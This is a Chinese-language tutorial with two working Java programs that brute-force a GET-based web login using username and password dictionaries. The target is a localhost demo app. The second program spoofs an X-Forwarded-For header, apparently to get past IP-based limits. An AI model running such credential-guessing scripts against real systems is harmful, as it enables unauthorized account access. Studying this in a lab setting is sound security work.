GET请求会将参数放在URL中,如果通过GET请求登录,则会将用户名和密码放在URL中进行发送,此时我们可以通过构建URL来进行测试登录,并获取到返回的数据,来判定登录结果,来达到爆破的结果。
我们需要通过socket的方式进行连接,并准备用户名和密码字典,依次取出字典中的值,通过两个for循环,用外层用户名,内层密码的方式构建URL,再依次发送,并接收返回的数据,判断登录结果。
此时需要注意的是,在发送了请求后,判定登录失败,则需要关闭socket,并重新建立socket进行下一次登录。
第一种
package com.mtlk.hd; import java.io.*; import java.net.Socket; import java.util.Scanner; public class GetDemo { private PrintWriter pw; private BufferedReader br; private Socket s; private static StringBuffer responseBody = new StringBuffer("0"); public GetDemo() throws IOException, InterruptedException { //创建流套接字,并获取输入输出流 s = new Socket("127.0.0.1",8080); pw = new PrintWriter(s.getOutputStream(),true); br = new BufferedReader(new InputStreamReader(s.getInputStream())); } private void send(String mes) throws IOException, InterruptedException { System.out.println("---------------------request---------------------------"); StringBuffer request = new StringBuffer("GET /WebDemo_2_war_exploded/user?name=" + mes + "&pass=123 HTTP/1.1\r\n"); request.append("HOST:127.0.0.1\r\n"); pw.println(request.toString()); pw.flush(); System.out.println(request.toString()); System.out.println("---------------------response---------------------------"); responseBody = new StringBuffer(); String str = ""; while((str = br.readLine()) != null) { responseBody.append(str + "\r\n"); System.out.println(str); if(str.trim().contains("Error")){ responseBody.append("0"); break; } } s.close(); } public static void main(String[] args) throws IOException, InterruptedException { //读文件,并按特殊字符拆分字符串 FileInputStream fis = new FileInputStream("E:/字典1/name.txt"); byte[] content = new byte[fis.available()]; fis.read(content); String context = new String(content); //通过空行为特殊符号,拆分字符串 String[] mess = context.split("\r\n"); //根据字符数组循环发送请求和接收响应 //发一次,收一次,收发完成下一次 int length = mess.length; int index = 0; while(true){ if(responseBody.toString().trim().endsWith("0")){ if(index == length){ break; } String mes = mess[index++]; new GetDemo().send(mes); } Thread.sleep(100); } } }第二种,带HttpClient包 package com.mtlk.hcd;
import org.apache.http.HttpEntity; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClients; import org.apache.http.util.EntityUtils; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.util.Scanner; public class GetDemo { public static void main(String[] args) throws IOException { //加载文件 InputStream is = new FileInputStream("E:/字典1/postman_pass.txt"); Scanner sc = new Scanner(is); while(sc.hasNextLine()){ //对HttpClient进行实例化 CloseableHttpClient httpclient = HttpClients.createDefault(); String pass = sc.nextLine(); //创建GET请求 HttpGet httpget = new HttpGet("http://localhost:8080/WebDemo_2_war_exploded/user?name=admin&pass="+pass); httpget.setHeader("X-Forwarded-For","127.0.0.1"); //执行GET请求 CloseableHttpResponse response = httpclient.execute(httpget); HttpEntity entity = response.getEntity(); System.out.println(EntityUtils.toString(entity)); //关闭连接,释放资源 httpclient.close(); } } }